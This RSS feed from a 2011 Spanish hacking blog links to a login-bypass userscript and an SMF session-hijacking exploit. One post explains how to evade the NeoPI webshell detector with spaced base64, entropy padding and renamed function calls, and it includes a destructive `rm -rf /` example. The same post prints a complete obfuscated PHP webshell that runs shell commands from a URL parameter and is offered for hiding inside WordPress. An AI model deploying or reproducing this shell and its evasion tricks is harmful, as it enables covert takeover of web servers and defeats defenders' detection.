<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>El rincon de seth</title>
	<atom:link href="http://elrincondeseth.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://elrincondeseth.wordpress.com</link>
	<description>Just another rincon</description>
	<lastBuildDate>Wed, 28 Dec 2011 03:23:50 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='elrincondeseth.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>El rincon de seth</title>
		<link>http://elrincondeseth.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://elrincondeseth.wordpress.com/osd.xml" title="El rincon de seth" />
	<atom:link rel='hub' href='http://elrincondeseth.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Punkycacos live at Speed King</title>
		<link>http://elrincondeseth.wordpress.com/2011/11/02/punkycacos-live-at-speed-king/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/11/02/punkycacos-live-at-speed-king/#comments</comments>
		<pubDate>Wed, 02 Nov 2011 06:04:09 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[/dev/urandom]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=490</guid>
		<description><![CDATA[Para todos los fans La musica empieza mas o menos a los 20 minutos<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=490&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="https://www.youtube.com/watch?v=MXBJ3ekvtng" title="Para todos los fans">Para todos los fans</a><br />
La musica empieza mas o menos a los 20 minutos</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/490/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/490/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/490/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/490/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/490/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/490/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/490/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/490/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/490/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/490/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/490/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/490/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/490/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/490/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=490&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/11/02/punkycacos-live-at-speed-king/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Sos bueno con las inyecciones sql? rompeme la web</title>
		<link>http://elrincondeseth.wordpress.com/2011/09/17/sos-bueno-con-las-inyecciones-sql-rompeme-la-web/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/09/17/sos-bueno-con-las-inyecciones-sql-rompeme-la-web/#comments</comments>
		<pubDate>Sat, 17 Sep 2011 22:53:28 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=478</guid>
		<description><![CDATA[Hice una web para que que practiquen sqli con y sin filtros Va a estar online minimo una semana (a menos que me rompan todo antes) http://vepeese.xdblog.com.ar/<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=478&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hice una web para que que practiquen sqli con y sin filtros<br />
Va a estar online minimo una semana (a menos que me rompan todo antes) <a href="http://vepeese.xdblog.com.ar/">http://vepeese.xdblog.com.ar/</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/478/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/478/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/478/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/478/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/478/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/478/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/478/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/478/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/478/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/478/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/478/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/478/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/478/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/478/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=478&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/09/17/sos-bueno-con-las-inyecciones-sql-rompeme-la-web/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Coso para bypassear logins</title>
		<link>http://elrincondeseth.wordpress.com/2011/08/24/coso-para-bypassear-logins/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/08/24/coso-para-bypassear-logins/#comments</comments>
		<pubDate>Wed, 24 Aug 2011 08:34:00 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=476</guid>
		<description><![CDATA[Dejo este script. Hay que instalarlo (hace falta greasemonkey), ir a un login y empezar a apretar botones para ver si alguno te loguea. Lo que hace es meter cookies para tratar de explotar esto. http://xd-blog.com.ar/descargas/programas/cookie_login_bypass/script.1.0.user.js<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=476&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Dejo este script. Hay que instalarlo (hace falta greasemonkey), ir a un login y empezar a apretar botones para ver si alguno te loguea.<br />
Lo que hace es meter cookies para tratar de explotar <a href="https://elrincondeseth.wordpress.com/2010/08/27/nickserv-sourcegeek-has-been-ghosted/">esto</a>.</p>
<p><a href="http://xd-blog.com.ar/descargas/programas/cookie_login_bypass/script.1.0.user.js">http://xd-blog.com.ar/descargas/programas/cookie_login_bypass/script.1.0.user.js</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/476/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=476&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/08/24/coso-para-bypassear-logins/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Bypasseando NeoPI</title>
		<link>http://elrincondeseth.wordpress.com/2011/08/17/bypasseando-neopi/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/08/17/bypasseando-neopi/#comments</comments>
		<pubDate>Wed, 17 Aug 2011 06:43:22 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=465</guid>
		<description><![CDATA[Estaba perdiendo el tiempo en reddit y vi NeoPI. Es un programa que detecta webshells y está bastante bueno, encuentra emelco, una shell osfuscada y una wso metida al final de una imagen. Tiene varias formas de detectar las shells, pero todas se puede bypassear: Strings largas: Si codificas con base64 una shell comun vas [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=465&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Estaba perdiendo el tiempo en reddit y vi <a href="http://labs.neohapsis.com/2011/08/02/webshell-recap/">NeoPI</a>. Es un programa que <a href="http://resources.infosecinstitute.com/web-shell-detection/">detecta webshells</a> y está bastante bueno, encuentra <a href="http://code.google.com/p/emelco/">emelco</a>, una <a href="http://xd-blog.com.ar/makeshell/?">shell osfuscada</a> y una wso metida al final de una imagen.<br />
Tiene varias formas de detectar las shells, pero todas se puede bypassear:</p>
<ul>
<li>Strings largas: Si codificas con base64 una shell comun vas a tener un string muy largo y va a saltar al toque. Simplemente metemos espacios para separar el string, base64_decode los va a ignorar
</li>
<li>Entropia: Cuanta mas variado es el contendido del archivo, mas va a llamar la atención:<br />
<pre class="brush: php;">	def calculate(self,data,filename):
		&quot;&quot;&quot;Calculate the entropy for 'data' and append result to entropy_results array.&quot;&quot;&quot;

		if not data:
			return 0
		entropy = 0
		for x in range(256):
			p_x = float(data.count(chr(x)))/len(data)
			if p_x &gt; 0:
				entropy += - p_x * math.log(p_x, 2)
		self.results.append({&quot;filename&quot;:filename, &quot;value&quot;:entropy})
		return entropy</pre><br />
Si metemos espacios despues de cada caracter del string en base64 aumentamos el largo del archivo y la entropia va a ser menor. Tambien se puede agregar un comentario con aaaaaaaaaaaaaaaaaaaaaaaaa(metele a&#8217;s hasta que la entropia baje lo suficiente)
</li>
<li>Indice de coincidencia: No le di bola, la una shell que encontró fue la que estaba despues de una imagen
</li>
<li>Firmas: Hay que evitar usar eval(), system() y demas funciones comunes en las webshells. Se pueden usar <a href="http://www.php.net/manual/en/functions.variable-functions.php">funciones globales</a> asi:<br />
<pre class="brush: php;">$a = 'sys'.'tem'; 
$a('rm -rf /');</pre><br />
eval() no es una función pero se puede reemplazar por algo asi: <pre class="brush: php;">file_put_contents('/tmp/asd', 'codigo'); 
include('/tmp/asd');
</pre></li>
</ul>
<p>Este codigo se esconde joya en un directorio de wordpress 3:<br />
<pre class="brush: php;">&lt;?PHP
$b = 'bas'.'e64'.'_de'.'code';
file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h l e G V j K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P W V 4 Z W M o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Z X h l Y y g k Y 2 1 k K S c 7 f Q o g I C A g I C A g I A o g I C A g I C A g I G V s c 2 V p Z i A o c 3 l z d G V t c m V 0 d X J u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N 5 c 3 R l b X J l d H V y b i g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z e X N 0 Z W 0 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H B h c 3 N 0 a H J 1 c m V 0 d X J u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X B h c 3 N 0 a H J 1 c m V 0 d X J u K C R j b W Q p O y A k c 2 F s a W R h W 1 0 9 J 0 1 v Z G 8 6 I H B h c 3 N 0 a H J 1 K C R j b W Q p J z t 9 C i A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s c H J v Y 2 9 w Z W 4 o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x w c m 9 j b 3 B l b i g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B w c m 9 j X 2 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I A o g I C A g I C A g I G V s c 2 V p Z i A o c 2 h l b G x w Y 2 5 0 b C g n Z W N o b y B h J y k p e y R z Y W x p Z G F b X T 1 z a G V s b H B j b n R s K C R j b W Q p O y A k c 2 F s a W R h W 1 0 9 J 0 1 v Z G 8 6 I H B j b n R s X 2 V 4 Z W M o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B p Z i A o J G F y c m F 5 K X s K I C A g I C A g I C A g I C A g c m V 0 d X J u I C R z Y W x p Z G E 7 C i A g I C A g I C A g f W V s c 2 V 7 C i A g I C A g I C A g I C A g I H J l d H V y b i A k c 2 F s a W R h W z B d O w o g I C A g I C A g I H 0 K I C A g I H 1 l b H N l e w o g I C A g I C A g I H J l d H V y b i B m Y W x z Z T s K I C A g I H 0 K f Q p m d W 5 j d G l v b i B z a G V s b H B v c G V u K C R j b W Q p e w o v K i B m d W V u d G U 6 I G F u d G l j a G F 0 I H d l Y n N o Z W x s I H Y x L j M g K i 8 K I C B p Z i g k Z n A g P S B w b 3 B l b i g k Y 2 1 k L C d y J y k p e y A K I C A g I C R y Z X N 1 b H Q g P S A n J z s K I C A g I H d o a W x l K C F m Z W 9 m K C R m c C k p e y R y Z X N 1 b H Q u P W Z y Z W F k K C R m c C w x M D I 0 K T t 9 C i A g I C B w Y 2 x v c 2 U o J G Z w K T s K I C A K I C A g I C R y Z X Q g P S A k c m V z d W x 0 O w o g I C A g J H J l d C A 9 I G N v b n Z l c n R f Y 3 l y X 3 N 0 c m l u Z y g k c m V 0 L C d k J y w n d y c p O w o g I C A g c m V 0 d X J u I C R y Z X Q 7 C i A g f W V s c 2 V 7 C i A g I C B y Z X R 1 c m 4 g Z m F s c 2 U 7 C i A g f Q p 9 C m Z 1 b m N 0 a W 9 u I H N 5 c 3 R l b X J l d H V y b i g k Y 2 1 k K X s K I C A g I G 9 i X 2 Z s d X N o K C k 7 C i A g I C B v Y l 9 z d G F y d C g p O w o g I C A g I C A g I H N 5 c 3 R l b S g k Y 2 1 k K T s K I C A g I C A g I C A k c 2 F s a W R h I D 0 g b 2 J f Z 2 V 0 X 2 N s Z W F u K C k 7 C i A g I C B v Y l 9 l b m R f Y 2 x l Y W 4 o K T s K I C A g I H J l d H V y b i A k c 2 F s a W R h O w p 9 C m Z 1 b m N 0 a W 9 u I H B h c 3 N 0 a H J 1 c m V 0 d X J u K C R j b W Q p e w o g I C A g b 2 J f Z m x 1 c 2 g o K T s K I C A g I G 9 i X 3 N 0 Y X J 0 K C k 7 C i A g I C A g I C A g c G F z c 3 R o c n U o J G N t Z C k 7 C i A g I C A g I C A g J H N h b G l k Y S A 9 I G 9 i X 2 d l d F 9 j b G V h b i g p O w o g I C A g b 2 J f Z W 5 k X 2 N s Z W F u K C k 7 C i A g I C B y Z X R 1 c m 4 g J H N h b G l k Y T s K f Q p m d W 5 j d G l v b i B z a G V s b H B y b 2 N v c G V u K C R j b W Q p e w o g I C A g J G R l c 2 N y a X B 0 b 3 J z c G V j I D 0 g Y X J y Y X k o C i A g I C A g I C A w I D 0 + I G F y c m F 5 K C d w a X B l J y w g J 3 I n K S w g C i A g I C A g I C A x I D 0 + I G F y c m F 5 K C d w a X B l J y w g J 3 c n K S w g C i A g I C A g I C A y I D 0 + I G F y c m F 5 K C d w a X B l J y w g J 3 c n K S A K I C A g I C k 7 C i A g I A o g I C A g J H B y b 2 N l c 3 M g P S B w c m 9 j X 2 9 w Z W 4 o J G N t Z C w g J G R l c 2 N y a X B 0 b 3 J z c G V j L C A k c G l w Z X M p O w o g I C A g C i A g I C B p Z i A o a X N f c m V z b 3 V y Y 2 U o J H B y b 2 N l c 3 M p K S B 7 I C A g I A o g I C A g I C A g I G Z j b G 9 z Z S g k c G l w Z X N b M F 0 p O w o g I C A g I C A g I C R z Y W x p Z G E g P S B z d H J l Y W 1 f Z 2 V 0 X 2 N v b n R l b n R z K C R w a X B l c 1 s x X S k 7 C i A g I C A g I C A g Z m N s b 3 N l K C R w a X B l c 1 s x X S k 7 C i A g I C A g I C A g Z m N s b 3 N l K C R w a X B l c 1 s y X S k 7 C i A g I C A g I C A g J H J l d H V y b l 9 2 Y W x 1 Z S A 9 I H B y b 2 N f Y 2 x v c 2 U o J H B y b 2 N l c 3 M p O w o g I C A g I C A g I H J l d H V y b i A k c 2 F s a W R h O w o g I C A g f W V s c 2 V 7 C i A g I C A g I C A g c m V 0 d X J u I G Z h b H N l O w o g I C A g f Q p 9 C m Z 1 b m N 0 a W 9 u I H N o Z W x s c G N u d G w o J G N t Z C l 7 C i A g I C B p Z i g h Z n V u Y 3 R p b 2 5 f Z X h p c 3 R z K C d w Y 2 5 0 b F 9 l e G V j J y k p e w o g I C A g I C A g I H J l d H V y b i B m Y W x z Z T s K I C A g I H 0 K I C A g I C R h c m d z I D 0 g Z X h w b G 9 k Z S g n I C c s J G N t Z C k 7 C i A g I C A k c G F 0 a C A 9 I C R h c m d z W z B d O w o g I C A g d W 5 z Z X Q o J G F y Z 3 N b M F 0 p O w o g I C A g a W Y o c G N u d G x f Z X h l Y y g k c G F 0 a C w k Y X J n c y k 9 P T 1 m Y W x z Z S l 7 C i A g I C A g I C A g c m V 0 d X J u I G Z h b H N l O w o g I C A g f W V s c 2 V 7 C i A g I C A g I C A g c m V 0 d X J u I C d F b C B j b 2 1 h b m R v I G Z 1 Z S B l a m V j d X R h Z G 8 s I H B l c m 8 g b m 8 g c 2 U g c H V k b y B y Z W N 1 c G V y Y X I g b G E g c 2 F s a W R h J z s K I C A g I H 0 K f Q o =                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 '));
include('/tmp/asd');
echo llehs($_GET['c'], false);

</pre></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/465/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/465/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/465/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/465/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/465/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/465/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/465/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/465/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/465/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/465/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/465/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/465/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/465/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/465/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=465&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/08/17/bypasseando-neopi/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Simple Machines forum (SMF) 2.0 session hijacking</title>
		<link>http://elrincondeseth.wordpress.com/2011/08/08/simple-machines-forum-smf-2-0-session-hijacking/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/08/08/simple-machines-forum-smf-2-0-session-hijacking/#comments</comments>
		<pubDate>Mon, 08 Aug 2011 03:21:25 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Full disclosure]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=462</guid>
		<description><![CDATA[X-C3ll encontró la vulnerabilidad y después yo hice el exploit y encontré otra forma mas copada de explotarla. Pueden ver su primer post acá Simple Machines forum (SMF) 2.0 session hijacking<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=462&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>X-C3ll encontró la vulnerabilidad y después yo hice el exploit y encontré otra forma mas copada de explotarla. Pueden ver <a href="http://0verl0ad.blogspot.com/2011/08/smf-20-privilege-escalade-from-token.html">su primer post acá</a><br />
<a href="http://xd-blog.com.ar//descargas/smf 2.0 session hijacking.txt">Simple Machines forum (SMF) 2.0 session hijacking</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/462/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/462/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/462/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=462&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/08/08/simple-machines-forum-smf-2-0-session-hijacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Reto 5</title>
		<link>http://elrincondeseth.wordpress.com/2011/08/05/reto-5/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/08/05/reto-5/#comments</comments>
		<pubDate>Fri, 05 Aug 2011 18:54:05 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=460</guid>
		<description><![CDATA[De la serie &#8220;&#8230;te regalo un peluche de&#8230;: http://xd-blog.com.ar/juego/5/<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=460&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>De la serie &#8220;&#8230;te regalo un peluche de&#8230;: <a href="http://xd-blog.com.ar/juego/5/">http://xd-blog.com.ar/juego/5/</a></p>
